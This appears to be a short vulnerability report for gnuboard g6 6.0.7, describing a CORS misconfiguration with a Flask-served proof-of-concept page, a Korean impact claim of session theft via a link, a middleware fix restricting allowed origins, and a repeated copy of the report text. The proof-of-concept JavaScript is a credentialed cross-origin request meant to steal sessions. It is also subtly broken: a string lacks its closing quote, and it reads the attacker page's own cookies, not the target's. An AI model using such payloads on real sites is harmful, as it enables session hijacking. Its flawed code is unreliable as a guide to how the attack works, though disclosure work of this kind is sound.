Version : 6.0.7
Vuln : CORS Misconfiguration
PoC
from flask import Flask , jsonify , send_from_directory
app = Flask (__name__ )
@app .route ('/' )
def serve_html ():
return send_from_directory ('' , 'index.html' )
if __name__ == '__main__' :
app .run (host = '0.0.0.0' , port = 8800 )< html >
< body >
< div id ="demo ">
< button type ="button " onclick ="cors() "> Exploit</ button >
</ div >
< script >
function cors ( ) {
var xhr = new XMLHttpRequest ( ) ;
xhr . onreadystatechange = function ( ) {
if ( this . readyState == 4 && this . status == 200 ) {
var cookies = document . cookie ;
document . getElementById ( "demo" ) . innerText = "Cookies: " + cookies ;
alert ( "Cookies: " + cookies ) ;
}
} ;
xhr . open ( "GET" , "http://<gnuboardHost>, true);
xhr . withCredentials = true ;
xhr . send ( ) ;
}
</ script >
</ body >
</ html > Impact
사용자에게 링크 접속만 해도 세션 탈취가 가능합니다.
Secure Code (core/middleware)
app .add_middleware (
CORSMiddleware ,
allow_origins = ["http://<gunboardHost>" ],
allow_credentials = True ,
allow_methods = ["*" ],
allow_headers = ["*" ],
) Video
video.mp4
ref: b9b6bb7 https://github.com/gnuboard/g6/blob/master/core/middleware.py#L81
Version: 6.0.7
Vuln: CORS Misconfiguration
PoC
Impact
Secure Code (core/middleware)
이와 같이 테스트가 아닌 프로덕션 환경에서는 allow_origins에 호스트를 지정 필요
Video
video.mp4
ref: b9b6bb7
https://github.com/gnuboard/g6/blob/master/core/middleware.py#L81